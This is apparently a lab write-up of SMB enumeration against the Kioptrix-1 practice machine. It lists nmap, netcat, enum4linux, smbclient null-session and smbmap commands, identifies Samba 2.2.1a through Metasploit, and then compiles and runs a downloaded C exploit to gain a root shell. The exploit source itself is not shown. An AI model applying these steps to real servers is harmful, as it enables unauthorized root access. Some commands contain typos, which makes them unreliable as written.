SMB Enumeration
SMB stands for server message block it is used for sharing the file b/w the computes, and the printers by default smb used a port no.139,445
port not:139 used sharing a file into a local network
port no:445 used for sharing a file over the IP network
In this enumeration, I am using kioptrix-1 in which smb version is vulnerable
our priority is to detect the version so there are so many ways which we can use to detect the smb version
port scan
nmap -v -p- 192.168.129.237
port no 139 is open in this machine
after knowing smb port is open next step is to find the version
nmap -v -p 139 -sC -sT -sV -A -O 192.168.129.237
we can’t get the version using nmap
using nc
nc -vv 192.168.129.237
in NC also we don't see the version
next we try Enum4Linux script
./Enum4LinuxPy.py -t 192.168.129.237 -a
here also we can’t see any kind of version info
so we try to make a null session using smbclinet
smbclinet -L //192.168.129.237
it is showing the error so lets try another command
smbclient //192.168.129.237/ — option=’client min protocol=NT1'
now this command shows us the share folders list we try to get into these folders
smbclient -N //192.168.129.237/ADMIN$
failed to login
smbmap -H //192.168.129.237/
after attempting different methods we don't get the version info
now I am using a metasploit to get the version
here we get the version samba 2.2.1a
search the exploit related to the version exploit link is here
exploit is in c language download exploit and compile it
gcc 10.c -o 10
assign an execution permission
chmod +x 10
after compile run the exploit
./10 -b -c 192.168.129.237
- b is for bruteforce , -c for ip
now we get the root shell